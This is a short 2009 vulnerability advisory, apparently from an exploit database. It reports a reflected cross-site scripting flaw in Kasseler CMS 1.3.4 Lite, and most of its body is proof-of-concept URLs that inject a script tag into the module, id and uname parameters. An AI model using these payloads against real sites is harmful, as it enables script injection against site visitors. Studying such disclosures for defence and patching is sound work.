Kasseler CMS 1.3.4 Lite cross site scripting

2009-12-23 / 2009-12-24
Credit: Gamoscu
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

############################################################# # Kasseler CMS 1.3.4 Lite XSS XSS Vulnerability # Author: Gamoscu # Site: www.1923turk.biz # Site: http://gamoscu.wordpress.com/ ############################################################## # Exploit: http://server/index.php?module=[target]&do="><script>alert();</script> ------------------------------------------------------------------- http://server/index.php?module=[target]&do=View&id="><script>alert();</script> http://server/index.php?module=[target]&do="><script>alert();</script> http://server/index.php?module=Account&do=UserInfo&uname="><script>alert();</script> ############################################################## # Greetz: Manas58 Baybora Delibey Tiamo Psiko ############################################################## Vatan Lafla Degil Eylemle Sevilir Kiskananlar catlasin Zorunuza Gitmesin


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top